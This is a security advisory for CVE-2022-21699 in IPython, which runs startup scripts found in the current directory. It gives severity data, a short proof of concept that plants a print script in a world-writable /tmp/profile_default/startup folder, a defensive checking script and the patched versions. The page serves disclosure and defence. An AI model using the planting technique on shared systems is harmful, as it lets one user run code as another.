CVE-2022-21699 ipython

Package

Manager: pip
Name: ipython
Vulnerable Version: >=0 <5.11 || >=6.0.0 <7.16.3 || >=7.17.0 <7.31.1 || >=8.0.0 <8.0.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P

EPSS: 0.02018 (percentile 0.8304)

Details

Execution with Unnecessary Privileges in ipython

We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in the current working directory (CWD). This vulnerability allows one user to run code as another.

## Proof of concept

User1:

```
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py
```

User2:

```
cd /tmp
ipython
```

User2 will see:

```
Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets
```

## Patched release and documentation

See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699.

Versions 8.0.1 and 7.31.1 are recommended for current Python versions. Version 7.16.3 has also been published for Python 3.6 users, and version 5.11 (source only, 5.x branch on GitHub) for older Python versions.
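A defensive check for the condition described above, added here as an example and not taken from the advisory or from IPython's own code: it tests an installed version string against the vulnerable ranges listed on this page and flags startup scripts under a directory's `profile_default/startup` that another user owns or could replace. The function names, the `.py`/`.ipy` filter and the ownership and permission heuristic are assumptions of this example.

```python
import os
import re
import stat
import tempfile

# Vulnerable ranges from this advisory, as [lower, upper) release tuples.
VULNERABLE = [((0, 0, 0), (5, 11, 0)), ((6, 0, 0), (7, 16, 3)),
              ((7, 17, 0), (7, 31, 1)), ((8, 0, 0), (8, 0, 1))]

def release(version):
    """Leading numeric part of a version, padded to three components."""
    nums = [int(n) for n in re.match(r"\d+(?:\.\d+)*", version).group().split(".")]
    return tuple(nums + [0] * (3 - len(nums)))

def is_vulnerable(version):
    """True if the version falls inside one of the advisory's ranges."""
    v = release(version)
    return any(lo <= v < hi for lo, hi in VULNERABLE)

def risky_startup_files(cwd, uid=None):
    """Startup scripts under cwd/profile_default that another user owns or can replace."""
    uid = os.getuid() if uid is None else uid
    startup = os.path.join(cwd, "profile_default", "startup")
    if not os.path.isdir(startup):
        return []
    others_can_write = stat.S_IWGRP | stat.S_IWOTH
    dir_st = os.stat(startup)
    dir_open = dir_st.st_uid != uid or bool(dir_st.st_mode & others_can_write)
    hits = []
    for name in sorted(os.listdir(startup)):
        if not name.endswith((".py", ".ipy")):  # script types run at startup
            continue
        st = os.stat(os.path.join(startup, name))
        if dir_open or st.st_uid != uid or st.st_mode & others_can_write:
            hits.append(name)
    return hits

def demo():
    """Rebuild the advisory's directory layout in a temp dir (constructed sample)."""
    with tempfile.TemporaryDirectory() as tmp:
        startup = os.path.join(tmp, "profile_default", "startup")
        os.makedirs(startup)
        os.chmod(startup, 0o777)  # same mode as the advisory's mkdir -m 777
        with open(os.path.join(startup, "foo.py"), "w") as fh:
            fh.write('print("placeholder")\n')
        return risky_startup_files(tmp)

if __name__ == "__main__":
    print(is_vulnerable("7.29.0"), demo())
```

A hit from `risky_startup_files` only matters on a version for which `is_vulnerable` returns true; upgrading to a patched release is the fix the advisory recommends.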

Metadata

Created: 2022-01-21T18:55:30Z
Modified: 2024-09-27T17:22:07Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-pq7m-3gw7-gq5x/GHSA-pq7m-3gw7-gq5x.json
CWE IDs: ["CWE-250", "CWE-269", "CWE-279"]
Alternative ID: GHSA-pq7m-3gw7-gq5x
Finding: F159
Auto approve: 1